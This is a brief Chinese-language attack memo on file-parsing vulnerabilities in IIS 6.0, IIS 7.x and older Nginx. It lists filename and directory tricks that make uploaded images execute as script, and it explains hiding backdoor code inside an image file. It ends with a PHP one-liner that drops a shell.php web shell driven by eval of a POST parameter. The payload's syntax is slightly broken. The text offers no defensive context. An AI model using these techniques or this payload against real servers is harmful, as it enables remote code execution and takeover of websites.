IIS
IIS解析漏洞
IIS 6.0
解析利用方法有两种:
1.
目录解析
建立xx.asp为名称的文件夹,将asp文件放入,访问/xx.asp/xx.jpg,其中xx.jpg可以为任意文件后缀,即可解析
2.
文件解析
后缀解析:/xx.asp;.jpg /xx.asp:.jpg(此处需抓包修改文件名)
3.
默认解析:
/xx.asa
,/xx.cer,/xx.cdx
IIS7.5/ IIS 7.0/ Nginx <8.03
畸形解析漏洞
IIS 7.5
的解析漏洞利用手法,在正常图片URL后添加 /.php
常用利用方法: 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾
内容
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd]?>');?>